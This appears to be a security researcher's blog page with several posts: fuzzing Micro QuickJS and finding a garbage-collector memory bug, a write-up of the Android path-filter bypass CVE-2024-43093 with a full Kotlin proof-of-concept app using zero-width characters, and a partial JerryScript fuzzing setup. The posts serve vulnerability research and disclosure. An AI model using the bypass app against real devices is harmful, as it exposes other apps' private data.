Posts tagged Realworld

0. Motivation

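On 2025.12.23, legendary programmer Bellard (original author of Qemu, ffmpeg, QuickJS, TCC...) released his new project Micro QuickJS (mqjs), a JS engine for embedded systems. Since it is written in pure C, it probably has a few memory corruption bugs, right?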

1. Preparing the fuzzer

Components

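I decided to run the fuzzing with AFL++. Used directly, AFL++ builds random inputs byte by byte, and most of them are meaningless garbage (even with cmplog and friends). For a language interpreter we want inputs that actually get executed. Compiler theory tells us that going from a human-readable string to machine-executable bytecode or machine code takes at least three stages: lexical analysis, syntax analysis, and semantic analysis. A fully random input will struggle to get past even the lexer, never mind the parser and the semantic checks. If the generated input cannot run at all, we never reach the more valuable bugs in the VM and the GC (garbage collection, which frees memory).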

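Xidian University's School of Cyber Engineering has a sophomore elective on compilers. The final project is hand-writing a compiler for a custom drawing language using only the C standard library, which is great fun. I hear the course is gone starting with the class of 2024, though.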

I feel that starting from LLVM passes would be of more practical value.

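With Grammar-Mutator, however, we get grammar-level fuzzing. We only need to supply the production rules of the language's grammar, and they are compiled automatically into a custom mutator. At run time AFL calls it to turn an existing seed into an AST, pick a random node in the AST, mutate it into another node or subtree according to the productions, and finally generate code from the AST as a new seed. (See this article for details.)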
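The mutation loop described above can be sketched in a few lines. This is only a toy illustration, not Grammar-Mutator's implementation: the grammar, the tuple-based tree representation, and every function name here are assumptions made up for the example.

```python
import random

# Hypothetical toy grammar: each non-terminal maps to a list of productions.
GRAMMAR = {
    "<expr>": [["<num>"], ["<expr>", "+", "<expr>"], ["(", "<expr>", ")"]],
    "<num>": [["0"], ["1"], ["42"]],
}

def generate(symbol, rng, depth=0):
    """Expand a symbol into a tree: (symbol, children) for non-terminals, str for terminals."""
    if symbol not in GRAMMAR:
        return symbol
    rules = GRAMMAR[symbol]
    # Past a depth limit, take the first (non-recursive) production so expansion terminates.
    rule = rules[0] if depth > 4 else rng.choice(rules)
    return (symbol, [generate(s, rng, depth + 1) for s in rule])

def unparse(tree):
    """Turn a tree back into source text."""
    if isinstance(tree, str):
        return tree
    return "".join(unparse(child) for child in tree[1])

def non_terminal_paths(tree, path=()):
    """Yield the path (tuple of child indices) of every non-terminal node."""
    if isinstance(tree, str):
        return
    yield path
    for i, child in enumerate(tree[1]):
        yield from non_terminal_paths(child, path + (i,))

def node_at(tree, path):
    for i in path:
        tree = tree[1][i]
    return tree

def replace_at(tree, path, new_subtree):
    """Return a copy of the tree with the node at `path` replaced."""
    if not path:
        return new_subtree
    symbol, children = tree
    i = path[0]
    patched = replace_at(children[i], path[1:], new_subtree)
    return (symbol, children[:i] + [patched] + children[i + 1:])

def mutate(tree, rng):
    """Pick a random non-terminal node and regenerate its subtree from the grammar."""
    paths = list(non_terminal_paths(tree))
    if not paths:
        return tree  # nothing to mutate: hand the input back unchanged
    path = rng.choice(paths)
    symbol = node_at(tree, path)[0]
    return replace_at(tree, path, generate(symbol, rng))

rng = random.Random(0)
seed = generate("<expr>", rng)
print(unparse(seed))
print(unparse(mutate(seed, rng)))
```

Because every mutant is produced from the grammar, it always parses, which is the whole point compared with byte-level havoc.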

Of course, compiling with Address Sanitizer (-fsanitize=address) is a must. I also tried adding UB Sanitizer, but it blew up on practically any run. Is there UB everywhere?

Fixing a problem

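At first Grammar-Mutator would sometimes report the error _pick_non_term_node returns NULL and exit immediately. I do not know why, but in very rare cases it cannot find a production with which to mutate some non-terminal.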

In that case, just skip the mutation. Is killing the whole AFL run really a good idea? The following change is enough:

diff --git a/src/tree_mutation.c b/src/tree_mutation.c
index 68e91f9..62da2ed 100644
--- a/src/tree_mutation.c
+++ b/src/tree_mutation.c
@@ -39,8 +39,10 @@ tree_t *random_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
+
+    return mutated_tree;
 
   }
 
@@ -203,9 +205,10 @@ tree_t *splicing_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
 
+    return mutated_tree;
   }
 
   node_t *parent = node->parent;

Running

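Write a fuzzing harness for persistent mode, build the mutator library following Grammar-Mutator's official documentation, and generate the initial seeds automatically. We run AFL inside the aflplusplus/aflplusplus docker container with the following parameters: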

while true; do AFL_DISABLE_TRIM=1 AFL_CUSTOM_MUTATOR_LIBRARY=./libgrammarmutator-javascript.so AFL_USE_ASAN=1 afl-fuzz -i seeds/ -o out/ -b 2 -a text -G 1024 -t 200 -S asan -- ./mjs_harness_asan; sleep 1; done

A few lessons I picked up along the way:

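  • I disabled trimming (AFL_DISABLE_TRIM=1) because, for grammar-level fuzzing, trim throws away complex structure and makes it harder for later mutations to discover new branches.
  • Setting a timeout is right, but it must not be too low: slow seeds are actually the more valuable ones (complex GC behavior).
  • Grammar-Mutator's AST-based mutation behaves like unbounded recursion, so the cycles counter barely increases. That is normal.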

2. Fuzzing results

After about 11 hours, the first batch of crashes appeared.

[Screenshot: a0decb4d5ac7fed0f095f124b7c2f22e.png]

id 000000 looks roughly like this:

var a = [];
var b = [];
var c = [];
var d = [];
(Infinity**((((a+(((((((((((((((((((((new Float64Array(0,0/0,0,{g: false})))))))))))))))))))))==(~0)))))));
function Float64Array(console, EvalError,Int16Array,Reflect,NaN){
new Float64Array(false,TypeError[[[((((((((((((((((((((((((((((((((((((((((((((((((((((d.concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat((((--b) >>> -0)),(((--b) >>> -0)),(((--b) >>> 
// not disclosed in full for now ...

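There is obvious infinite recursion in there, plus a large number of concat calls. Together they put heavy allocation pressure on both the heap and the stack, which makes GC-related bugs quite likely.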

Address Sanitizer's verdict:

=================================================================
==1599335==ERROR: AddressSanitizer: negative-size-param: (size=-2112)
    #0 0x55f81ffe8449 in __asan_memmove (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f8200c1be2 in JS_MakeUniqueString /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:2032:5
    #2 0x55f8200aab94 in JS_ToPropertyKey /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:4193:16
    #3 0x55f8200aab94 in JS_Call /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:6009:28
    #4 0x55f82011a802 in JS_Run /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:11799:11
    #5 0x55f82003e19b in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:140:15
    #6 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #7 0x55f820038a38 in LLVMFuzzerRunDriver (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cea38) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #8 0x55f8200385c6 in main (/home/rik/Desktop/crashes/mjs_harness_asan+0x1ce5c6) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #9 0x7f24f4027634 in __libc_start_call_main /usr/src/debug/glibc/glibc/csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7f24f40276e8 in __libc_start_main /usr/src/debug/glibc/glibc/csu/../csu/libc-start.c:360:3
    #11 0x55f81feef3e4 in _start (/home/rik/Desktop/crashes/mjs_harness_asan+0x853e4) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

0x7f24f0c4f8b8 is located 327864 bytes inside of 4194304-byte region [0x7f24f0bff800,0x7f24f0fff800)
allocated by thread T0 here:
    #0 0x55f81ffeb905 in malloc (/home/rik/Desktop/crashes/mjs_harness_asan+0x181905) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f82003cee9 in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:112:21
    #2 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

SUMMARY: AddressSanitizer: negative-size-param (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4) in __asan_memmove
==1599335==

A negative size?

A little later, seven hundred-odd more crashes showed up, so I figured it was time to start analyzing.

3. Analyzing the crashes

Micro QuickJS's GC works as follows:

First it scans the entire heap to mark the objects that need to be freed (JS_MTAG_FREE):

/* 'size' is in bytes and must be multiple of JSW and > 0 */
static void set_free_block(void *ptr, uint32_t size)
{
    JSFreeBlock *p;
    p = (JSFreeBlock *)ptr;
    p->mtag = JS_MTAG_FREE;
    p->gc_mark = 0;
    p->size = (size - sizeof(JSFreeBlock)) / sizeof(JSWord);
}

Then JS_GC2 frees memory using the Jonkers algorithm (gc_compact_heap). Concretely, every object not tagged JS_MTAG_FREE is moved toward lower addresses, filling the holes left by the JS_MTAG_FREE objects.

    /* pass 2: update the threaded pointers and move the block to its
       final position */
    new_ptr = ctx->heap_base;
    ptr = ctx->heap_base;
    while (ptr < ctx->heap_free) {
        gc_update_threaded_pointers(ctx, ptr, new_ptr);
        size = get_mblock_size(ptr);
        if (js_get_mtag(ptr) != JS_MTAG_FREE) {
            if (new_ptr != ptr) {
                memmove(new_ptr, ptr, size);
            }
            new_ptr += size;
        }
        ptr += size;
    }
    ctx->heap_free = new_ptr;

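A key issue is that this kind of GC may move objects, so the GC must also rewrite the referrers' pointers to the new locations. Object pointers that are not on the JS VM stack (for example, JS object pointers held in a bare C array) cannot be tracked, so they immediately become dangling pointers. When writing mqjs code one therefore has to keep in mind at all times which functions may trigger GC, and push temporaries onto the JS VM stack.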
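A minimal sketch of why untracked references go stale under a moving collector. It uses a plain forwarding table rather than the pointer threading that mqjs uses, and the heap layout, block fields, and names are all made up for illustration.

```python
def compact(heap, roots):
    """Slide live blocks toward index 0 and rewrite the tracked roots.

    heap:  list of blocks, each a dict with "live" and "data"
    roots: dict mapping a name to a heap index (references the collector knows about)
    Returns the compacted heap; roots are updated in place.
    """
    forwarding = {}  # old index -> new index
    new_heap = []
    for old_index, block in enumerate(heap):
        if block["live"]:
            forwarding[old_index] = len(new_heap)
            new_heap.append(block)
    for name, old_index in roots.items():
        roots[name] = forwarding[old_index]
    return new_heap

heap = [
    {"live": False, "data": "garbage"},
    {"live": True, "data": "string table"},
    {"live": True, "data": "other object"},
]
roots = {"table": 1}  # tracked, like a value pushed on the JS VM stack
raw_index = 1         # untracked, like a pointer kept in a C local variable

heap = compact(heap, roots)

print(heap[roots["table"]]["data"])  # tracked reference still reaches the string table
print(heap[raw_index]["data"])       # stale index now lands on a different object
```

The tracked root follows the object to its new slot, while the raw index silently points at whatever slid into the old position.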

Almost all of these several hundred crashes come from overlooking a function that may trigger GC. Take the crash from section 2:

static JSValue JS_MakeUniqueString(JSContext *ctx, JSValue val) {
    // ...
    
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    val1 = find_atom(ctx, &a, arr, ctx->unique_strings_len, val); 
    if (!JS_IsNull(val1))
        return val1;
    
    JS_PUSH_VALUE(ctx, val);
    is_numeric = js_is_numeric_string(ctx, val);
    JS_POP_VALUE(ctx, val);
    if (is_numeric < 0)
        return JS_EXCEPTION;
    
    /* not found: add it in the table */
    JS_PUSH_VALUE(ctx, val);
    new_tab = js_resize_value_array(ctx, ctx->unique_strings,
                                 ctx->unique_strings_len + 1);
    JS_POP_VALUE(ctx, val);
    if (JS_IsException(new_tab))
        return JS_EXCEPTION;
    ctx->unique_strings = new_tab;
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    memmove(&arr->arr[a + 1], &arr->arr[a],
            sizeof(arr->arr[0]) * (ctx->unique_strings_len - a));
    
    // ...
}

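JS_MakeUniqueString first searches ctx->unique_strings (find_atom) for the index (a) of an identical string. This is a common optimization (string interning): before creating any string, check a string table for a duplicate; if one exists, reuse it, and otherwise allocate new space and insert it into the table, which avoids wasting memory on duplicates. But ctx->unique_strings_len shrinks between find_atom and memmove (the GC cleaned out part of the table), so ctx->unique_strings_len - a becomes negative! (a should never exceed ctx->unique_strings_len.) Both js_is_numeric_string and js_resize_value_array can trigger GC (mainly js_is_numeric_string).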
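The arithmetic behind the negative-size-param report can be checked by hand. The sketch below assumes 8-byte table entries on a 64-bit build, and the concrete values of a and unique_strings_len are hypothetical, chosen only so that the result matches the size=-2112 in the ASAN log.

```python
SIZEOF_ENTRY = 8  # assumption: each table entry is 8 bytes on a 64-bit build

def memmove_size(unique_strings_len, a):
    """Byte count from the C expression, viewed as a signed number."""
    return SIZEOF_ENTRY * (unique_strings_len - a)

def as_size_t(n):
    """The same value as memmove actually receives it (64-bit unsigned)."""
    return n & 0xFFFFFFFFFFFFFFFF

# Hypothetical numbers: the index was computed while the table was longer,
# then a GC shrank the table to 36 entries.
stale_a = 300
shrunk_len = 36

size = memmove_size(shrunk_len, stale_a)
print(size)             # -2112, the value ASAN prints
print(as_size_t(size))  # 18446744073709549504, an absurdly large move
```

Without ASAN, memmove would attempt to move close to 2^64 bytes, so the stale index turns directly into memory corruption.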

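Following the same reasoning we can find other GC UAF bugs, even exploitable ones. In fact, we can patch the mqjs source so that it runs a GC before every memory allocation. That digs out similar bugs far more efficiently, with no need to wait for AFL to stumble on a seed with GC pressure. (This should be a generally applicable trick.)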

4. Exploitation

...

5. Fix

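For the crash from section 2, a fairly simple fix is to run find_atom again right before the memmove to locate the insertion position. Also, js_is_numeric_string should not need O(n) space in the first place.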
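The idea of repeating the lookup can be sketched as follows. This is an analogy rather than the mqjs patch: a sorted Python list stands in for the unique string table, bisect stands in for find_atom, and the may_gc callback is a hypothetical stand-in for any call that can trigger a collection.

```python
import bisect

def insert_unique(table, value, may_gc):
    """Insert `value` into the sorted list `table`, tolerating a collection in between."""
    a = bisect.bisect_left(table, value)
    if a < len(table) and table[a] == value:
        return table[a]  # already interned
    may_gc(table)  # stands in for calls that can allocate and therefore run the GC
    # Look the position up again: the table may have shrunk, so the old `a` is not trusted.
    a = bisect.bisect_left(table, value)
    table.insert(a, value)
    return value

def shrinking_gc(table):
    """Pretend the collector dropped every entry except the first one."""
    del table[1:]

table = ["a", "b", "c", "d"]
insert_unique(table, "z", shrinking_gc)
print(table)  # ['a', 'z']
```

With the stale index (4) the insertion position would lie past the end of the shrunken table; recomputing it keeps the position valid at the cost of one extra search.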

...

The same approach also finds meaningful bugs in QuickJS-NG.

Introduction

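CVE‑2024‑43093 is a privilege escalation vulnerability in an Android Framework component. At its core, the file path filter has a logic flaw when handling paths that contain certain Unicode characters. Surprisingly, quite a few Android devices still have not fixed it. DuckDetector can check whether the current device is patched.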

Root cause

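The faulty code is the shouldHideDocument function in com/android/externalstorage/ExternalStorageProvider.java. The path check first normalizes the file path, with the intent of matching the filter rules correctly and preventing special-character injection. But this normalization does not cover every character, the zero-width space for example. Inserting a zero-width space into the accessed path bypasses the filter and allows reading and writing any directory under /sdcard/Android/{data,obb}/<package>.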
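The string-level half of the bypass is easy to see with the pre-patch pattern (the regex that the patch diff in the Fix section removes). The sketch below only shows that the filter stops matching once a zero-width character is inserted; that the storage layer underneath still resolves such a path to the real directory is the device-side behavior described above and is not demonstrated here. The package name is a placeholder.

```python
import re

# Pre-patch pattern from ExternalStorageProvider, as quoted in the patch diff.
RESTRICTED = re.compile(r"^Android/(?:data|obb|sandbox)(?:/.+)?", re.IGNORECASE)

def should_hide(path):
    # Java's Matcher.matches() requires the whole string to match, hence fullmatch.
    return RESTRICTED.fullmatch(path) is not None

plain = "Android/data/com.example.app"         # placeholder package name
sneaky = "Android/\u200bdata/com.example.app"  # U+200B ZERO WIDTH SPACE inserted

print(should_hide(plain))   # True: the filter catches the ordinary path
print(should_hide(sneaky))  # False: one invisible character defeats the match
```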

Fix

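Google already tried to fix this vulnerability in 2024, changing the path filter from a simple regex match to walking up the path level by level with Java file APIs and checking whether each level is the same file as a restricted directory, but that still does not stop the bug. The patch diff is as follows: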

@@ -16,8 +16,6 @@
 
 package com.android.externalstorage;
 
-import static java.util.regex.Pattern.CASE_INSENSITIVE;
-
 import android.annotation.NonNull;
 import android.annotation.Nullable;
 import android.app.usage.StorageStatsManager;
@@ -61,12 +59,15 @@
 import java.io.FileNotFoundException;
 import java.io.IOException;
 import java.io.PrintWriter;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Arrays;
 import java.util.Collections;
 import java.util.List;
 import java.util.Locale;
 import java.util.Objects;
 import java.util.UUID;
-import java.util.regex.Pattern;
+import java.util.stream.Collectors;
 
 /**
  * Presents content of the shared (a.k.a. "external") storage.
@@ -89,12 +90,9 @@
     private static final Uri BASE_URI =
             new Uri.Builder().scheme(ContentResolver.SCHEME_CONTENT).authority(AUTHORITY).build();
 
-    /**
-     * Regex for detecting {@code /Android/data/}, {@code /Android/obb/} and
-     * {@code /Android/sandbox/} along with all their subdirectories and content.
-     */
-    private static final Pattern PATTERN_RESTRICTED_ANDROID_SUBTREES =
-            Pattern.compile("^Android/(?:data|obb|sandbox)(?:/.+)?", CASE_INSENSITIVE);
+    private static final String PRIMARY_EMULATED_STORAGE_PATH = "/storage/emulated/";
+
+    private static final String STORAGE_PATH = "/storage/";
 
     private static final String[] DEFAULT_ROOT_PROJECTION = new String[] {
             Root.COLUMN_ROOT_ID, Root.COLUMN_FLAGS, Root.COLUMN_ICON, Root.COLUMN_TITLE,
@@ -309,11 +307,70 @@
             return false;
         }
 
-        final String path = getPathFromDocId(documentId);
-        return PATTERN_RESTRICTED_ANDROID_SUBTREES.matcher(path).matches();
+        try {
+            final RootInfo root = getRootFromDocId(documentId);
+            final String canonicalPath = getPathFromDocId(documentId);
+            return isRestrictedPath(root.rootId, canonicalPath);
+        } catch (Exception e) {
+            return true;
+        }
     }
 
     /**
+     * Based on the given root id and path, we restrict path access if file is Android/data or
+     * Android/obb or Android/sandbox or one of their subdirectories.
+     *
+     * @param canonicalPath of the file
+     * @return true if path is restricted
+     */
+    private boolean isRestrictedPath(String rootId, String canonicalPath) {
+        if (rootId == null || canonicalPath == null) {
+            return true;
+        }
+
+        final String rootPath;
+        if (rootId.equalsIgnoreCase(ROOT_ID_PRIMARY_EMULATED)) {
+            // Creates "/storage/emulated/<user-id>"
+            rootPath = PRIMARY_EMULATED_STORAGE_PATH + UserHandle.myUserId();
+        } else {
+            // Creates "/storage/<volume-uuid>"
+            rootPath = STORAGE_PATH + rootId;
+        }
+        List<java.nio.file.Path> restrictedPathList = Arrays.asList(
+                Paths.get(rootPath, "Android", "data"),
+                Paths.get(rootPath, "Android", "obb"),
+                Paths.get(rootPath, "Android", "sandbox"));
+        // We need to identify restricted parent paths which actually exist on the device
+        List<java.nio.file.Path> validRestrictedPathsToCheck = restrictedPathList.stream().filter(
+                Files::exists).collect(Collectors.toList());
+
+        boolean isRestricted = false;
+        java.nio.file.Path filePathToCheck = Paths.get(rootPath, canonicalPath);
+        try {
+            while (filePathToCheck != null) {
+                for (java.nio.file.Path restrictedPath : validRestrictedPathsToCheck) {
+                    if (Files.isSameFile(restrictedPath, filePathToCheck)) {
+                        isRestricted = true;
+                        Log.v(TAG, "Restricting access for path: " + filePathToCheck);
+                        break;
+                    }
+                }
+                if (isRestricted) {
+                    break;
+                }
+
+                filePathToCheck = filePathToCheck.getParent();
+            }
+        } catch (Exception e) {
+            Log.w(TAG, "Error in checking file equality check.", e);
+            isRestricted = true;
+        }
+
+        return isRestricted;
+    }
+
+
+    /**
      * Check that the directory is the root of storage or blocked file from tree.
      * <p>
      * Note, that this is different from hidden documents: blocked documents <b>WILL</b> appear

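Later Google also tried patching the F2FS filesystem directly in the kernel, but that did not complete the fix either. (Reportedly they even got criticized by Linus for breaking F2FS.) For a real fix, see the Xposed module written by 5ec1cff. I reverse engineered it with jadx: in its Xposed entry, the module injects a shared library, fusefixer.so, into com.android.providers.media.module: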

    public void handleLoadPackage(XC_LoadPackage.LoadPackageParam loadPackageParam) {
        if ("com.android.providers.media.module".equals(loadPackageParam.packageName) || "com.google.android.providers.media.module".equals(loadPackageParam.packageName)) {
            System.loadLibrary("fusefixer");
            Log.d("FuseFixer", "injected");
            new Handler(Looper.getMainLooper()).post(new RunnableC0016i(0, this));
        }
    }

Inside it, the library hooks is_package_owned_path, is_app_accessible_path, and is_bpf_backing_path in libfuse_jni.so. The replacement functions do the following:

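  1. Check whether the input string contains Unicode characters that need handling;
  2. If so, make a writable copy of the string, scan it, and remove the illegal characters;
  3. Call the original function with the sanitized string as the argument.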
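The three steps above can be sketched as a wrapper around the original check. This is a conceptual model only: the set of code points is an assumption (the module's actual list is not given here), and is_restricted is a hypothetical stand-in for the hooked native functions.

```python
# Assumption: an illustrative set of zero-width code points, not the module's real list.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\ufeff"}

def needs_cleaning(path):
    """Step 1: does the path contain any character we want to strip?"""
    return any(ch in ZERO_WIDTH for ch in path)

def clean(path):
    """Step 2: build a copy of the path without the unwanted characters."""
    return "".join(ch for ch in path if ch not in ZERO_WIDTH)

def hook(original):
    """Step 3: wrap `original` so that it always sees the cleaned path."""
    def replacement(path, *args):
        if needs_cleaning(path):
            path = clean(path)
        return original(path, *args)
    return replacement

# Hypothetical stand-in for a path check such as is_app_accessible_path.
def is_restricted(path):
    return path.startswith("/storage/emulated/0/Android/data/")

checked = hook(is_restricted)
sneaky = "/storage/emulated/0/Android/\u200ddata/com.example.app"

print(is_restricted(sneaky))  # False: the raw check is fooled
print(checked(sneaky))        # True: the hooked check sees the cleaned path
```

Cleaning at the point where the decision is made, rather than in a separate filter in front of it, means the check and the lookup can no longer disagree about what the path is.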

Reportedly Google patched this vulnerability again in the January 2026 update, but it is still exploitable on my device after updating.

Reproduction

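Since this vulnerability was disclosed long ago, showing the reproduction should be fine. All it takes is a simple file-manager-like app (I went with Jetpack Compose) whose path input supports Unicode escapes, or lets the user insert zero-width Unicode characters directly. I can still reproduce the bug on HyperOS 3.0.5.0, the latest version at the time of writing.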

package cn.pwnerik.pathescape

import android.os.Bundle
import androidx.activity.ComponentActivity
import androidx.activity.compose.setContent
import androidx.activity.enableEdgeToEdge
import androidx.compose.foundation.clickable
import androidx.compose.foundation.layout.*
import androidx.compose.foundation.lazy.LazyColumn
import androidx.compose.foundation.lazy.items
import androidx.compose.material3.*
import androidx.compose.runtime.*
import androidx.compose.ui.Alignment
import androidx.compose.ui.Modifier
import androidx.compose.ui.text.TextRange
import androidx.compose.ui.text.input.TextFieldValue
import androidx.compose.ui.tooling.preview.Preview
import androidx.compose.ui.unit.dp
import cn.pwnerik.pathescape.ui.theme.PathEscapeTheme
import java.io.File

class MainActivity : ComponentActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        enableEdgeToEdge()
        setContent {
            PathEscapeTheme {
                Scaffold(modifier = Modifier.fillMaxSize()) { innerPadding ->
                    FileExplorer(
                        modifier = Modifier.padding(innerPadding)
                    )
                }
            }
        }
    }
}

fun unescapeUnicode(input: String): String {
    val regex = Regex("\\\\u([0-9a-fA-F]{4})")
    return regex.replace(input) {
        try {
            it.groupValues[1].toInt(16).toChar().toString()
        } catch (_: Exception) {
            it.value
        }
    }
}

fun escapeUnicode(input: String): String {
    val sb = StringBuilder()
    for (char in input) {
        if (char.code !in 32..126) {
            sb.append(String.format("\\u%04x", char.code))
        } else {
            sb.append(char)
        }
    }
    return sb.toString()
}

@Composable
fun FileExplorer(modifier: Modifier = Modifier) {
    var pathValue by remember { mutableStateOf(TextFieldValue("")) }
    var files by remember { mutableStateOf(listOf<File>()) }
    var parentDir by remember { mutableStateOf<File?>(null) }
    var errorMessage by remember { mutableStateOf<String?>(null) }
    var hasStarted by remember { mutableStateOf(false) }

    fun listFiles(path: String) {
        val decodedPath = unescapeUnicode(path)
        val directory = File(decodedPath)
        
        // Always update the input box to show the normalized escaped path
        val escapedPath = escapeUnicode(directory.absolutePath)
        pathValue = TextFieldValue(
            text = escapedPath,
            selection = TextRange(escapedPath.length)
        )

        try {
            if (directory.exists() && directory.isDirectory) {
                val list = directory.listFiles()
                files = list?.toList()?.sortedWith(compareBy({ !it.isDirectory }, { it.name.lowercase() })) ?: emptyList()
                parentDir = directory.parentFile
                errorMessage = null
                hasStarted = true
            } else {
                errorMessage = "Invalid directory path: $decodedPath"
                files = emptyList()
                parentDir = null
            }
        } catch (e: Exception) {
            errorMessage = "Error: ${e.message}"
            files = emptyList()
            parentDir = null
        }
    }

    fun insertAtCursor(textToInsert: String) {
        val text = pathValue.text
        val selection = pathValue.selection
        val newText = text.take(selection.start) + textToInsert + text.substring(selection.end)
        val newCursorPosition = selection.start + textToInsert.length
        pathValue = TextFieldValue(
            text = newText,
            selection = TextRange(newCursorPosition)
        )
    }

    Column(
        modifier = modifier
            .fillMaxSize()
            .padding(16.dp)
    ) {
        Row(
            modifier = Modifier.fillMaxWidth(),
            verticalAlignment = Alignment.CenterVertically
        ) {
            TextField(
                value = pathValue,
                onValueChange = { pathValue = it },
                modifier = Modifier.weight(1f),
                label = { Text("Directory path") },
                singleLine = true
            )
            Spacer(modifier = Modifier.width(8.dp))
            Button(onClick = { listFiles(pathValue.text) }) {
                Text("List")
            }
        }

        Spacer(modifier = Modifier.height(8.dp))

        Row(
            modifier = Modifier.fillMaxWidth(),
            horizontalArrangement = Arrangement.spacedBy(8.dp)
        ) {
            OutlinedButton(onClick = { insertAtCursor("/storage/emulated/0") }) {
                Text("Home")
            }
            OutlinedButton(onClick = { insertAtCursor("\\u200d") }) {
                Text("Zero-width char")
            }
            OutlinedButton(onClick = { pathValue = TextFieldValue("", TextRange.Zero) }) {
                Text("Clear")
            }
        }

        Spacer(modifier = Modifier.height(16.dp))

        if (errorMessage != null) {
            Text(
                text = errorMessage!!,
                color = MaterialTheme.colorScheme.error,
                modifier = Modifier.padding(bottom = 8.dp)
            )
        }

        LazyColumn(modifier = Modifier.fillMaxSize()) {
            // Add parent directory link if not at root and after first listing
            if (hasStarted && parentDir != null) {
                item {
                    FileItem(
                        name = "..",
                        isDirectory = true,
                        onClick = { listFiles(parentDir!!.absolutePath) }
                    )
                    HorizontalDivider(modifier = Modifier.padding(vertical = 4.dp), thickness = 0.5.dp)
                }
            }
            
            items(files) { file ->
                FileItem(
                    name = file.name,
                    isDirectory = file.isDirectory,
                    onClick = {
                        if (file.isDirectory) {
                            listFiles(file.absolutePath)
                        }
                    }
                )
                HorizontalDivider(modifier = Modifier.padding(vertical = 4.dp), thickness = 0.5.dp)
            }
        }
    }
}

@Composable
fun FileItem(name: String, isDirectory: Boolean, onClick: () -> Unit) {
    val type = if (isDirectory) "[DIR] " else "[FILE] "
    Text(
        text = "$type$name",
        modifier = Modifier
            .fillMaxWidth()
            .clickable(onClick = onClick)
            .padding(vertical = 12.dp),
        style = MaterialTheme.typography.bodyLarge
    )
}

@Preview(showBackground = true)
@Composable
fun FileExplorerPreview() {
    PathEscapeTheme {
        FileExplorer()
    }
}

Reproduction screenshot

Before we start

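I had been meaning to get into Chrome V8, but after studying it for a while I found V8 still takes too much skill... It seemed wiser to get to know a simpler JS engine first. So I figured I would start with JerryScript, a lightweight JS engine suited to embedded devices. JerryScript's Issues happen to contain lots of vulnerability reports (that nobody seems to care about), so let's reproduce bug hunting by fuzzing.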

Source and build

git clone https://github.com/jerryscript-project/jerryscript
cd jerryscript
python tools/build.py

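Building JerryScript is quite simple. To fuzz it, we could just have AFL pass the file as an argument and wait for crashes. But fuzzing like that is pointless, because the binary has no AFL instrumentation. We need to use afl-clang-lto as the compiler. How AFL is used and how it works has been covered thoroughly by others, so I will not repeat it here.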

JerryScript's tools/build.py already provides a build option for hooking up libfuzzer, and AFL supports persistent mode for libfuzzer harness binaries. So let's just use what is already there.

CC=afl-clang-lto python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum-conversion' --strip=OFF
CC=afl-clang-lto AFL_LLVM_CMPLOG=1 python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum-conversion -fsanitize=address' --strip=OFF

We need the -Wno-enum-enum-conversion compile flag so that newer versions of clang do not fail the build. (To build with a newer gcc you also need -Wno-unterminated-string-initialization, because day_names_p and month_names_p in jerry-core/ecma/builtin-objects/ecma-builtin-helpers-date.c do not account for the space taken by the trailing NUL byte of C-style string literals.)

Preparing the initial corpus

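As an experiment I did not overthink it: I took test262 as JS samples, stripped the comments, and used them directly as the initial corpus. I chose AFL as the fuzzing engine. For a JS engine this will not work well, but it was only meant as an experimental attempt anyway. During fuzzing, AFL keeps building new inputs from these files using various strategies, collects the coverage of the program for each input, and goes on to build more inputs.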

import os
import shutil
import subprocess

TEST262_REPO = "https://github.com/tc39/test262.git"
CLONE_DIR = "test262"
CORPUS_DIR = "corpus"
NUM_FILES = 100  # Adjust how many files you want

# Directories considered ES5 core tests
ES5_TEST_DIRS = [
    "test/built-ins",
    "test/language",
    "test/statements",
    "test/annexB"
]

def clone_test262():
    if not os.path.exists(CLONE_DIR):
        print("Cloning test262 repo...")
        subprocess.run(["git", "clone", TEST262_REPO], check=True)
    else:
        print("test262 repo already cloned.")

def gather_es5_js_files():
